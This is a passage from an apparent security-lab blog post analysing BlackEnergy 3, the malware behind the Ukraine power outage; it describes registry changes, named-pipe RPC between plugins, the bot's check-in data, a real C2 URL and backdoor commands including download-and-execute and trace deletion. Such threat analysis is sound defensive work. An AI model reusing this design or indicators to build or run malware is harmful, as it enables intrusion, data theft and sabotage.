    • Software\Microsoft\Internet Explorer\Recovery NoReopenLastSession
    • Software\Microsoft\Internet Explorer\Main NoProtectedModeBanner
    • Software\Microsoft\Internet Explorer\TabbedBrowsing
    • Software\Microsoft\Internet Explorer\Recovery

The function also creates a separate thread that initiates the RPC communication over named pipes. The mentioned named pipe is the method of communication of different BE 3 plugins over the same network.

      1. Pipe\{AA0EED25-4167-4CBB-BDA8-9A0F5FF93EA8}

(D) Creates a file named NTUSER.LOG. Currently, due to the way it was programmed, it only creates a 0 byte file.

(E) Forms the message that will be sent over to its CnC server. It contains the following information:

      • B_id : BotID, comprises of <computername> _<unique bot identifier>
      • B_gen : generation of bot, on this case “release”
      • B_ver : Bot version, “2.2”
      • Os_v : target system OS version, “2600” (Build version of Windows XP)
      • Os_type: OS type, “0”

Using CryptBinaryToString, it “encrypts” the data that will be sent over the network and sent to its CnC server as POST data as the body parameter

post_data

(F) Creates an instance of Internet Explorer in the background using CoCreateInstance API. Since the settings of IE were already modified, no GUI will be seen, and it will be running under svchost.exe.

  • D30C1661-CDAF-11D0-8A3E-00C04FC9E26E using this GUID, an empty instance of IE will be called as it is the default handler of IWebBrowser2 interface.
  • Connects to http://5.149.254.114/Microsoft/Update/KC074913.php as an RPC client to send the information to a remote server.

rpc_cnc_connection

(G) Assuming a connection to the remote server has been made, it accepts 4 basic commands:

  • Delete – deletes a specified file
  • Ldplg – loads a plugin
  • Unlplg – unload a plugin
  • Dexec – download and execute a binary file

Using this, it has made itself modular as it can download and execute different plugin based on what type of attack will be performed. BlackEnergy has already been linked to several found plugins that also uses the named pipe mentioned above as inter-process communication, locally or even over the local network.

It is believed that these backdoor commands are the ones responsible for the attack that happened. The authors would upload new plugins, execute them and, after the damage has been done, delete the traces. These are (but not limited to):

      • Input/Output (IO) operations, deleting files and wiping away traces
      • Gathering system information
      • Keyloggers
      • Password stealers
      • Taking of screenshots
      • Remote access, SSH or RDP

After which, it will sleep for X number of seconds, depending on the one indicated on its configuration data and attempt to send the information and accept new commands from the CnC server.

Summary

overall_flow

Fig 11: Simplified overall flow of BlackEnergy 3

Point of entry is using a targeted spear-phishing email with a malicious attachment. Once it has been executed, the malware would be able to download and install new plugins. Communication between the core malware module and plugins are achieved through RPC communication. This is employed since most ICS are on an isolated network. Even if the target systems are on a network that does not have internet connection, the malware would still be able to ex-filtrate the data, install new plugins and control the systems using RPC named pipes over SMB. Simplified diagram on Fig 11.

The post Breaking Down the Malware Behind the Ukraine Power Outage appeared first on ThreatTrack Security Labs Blog.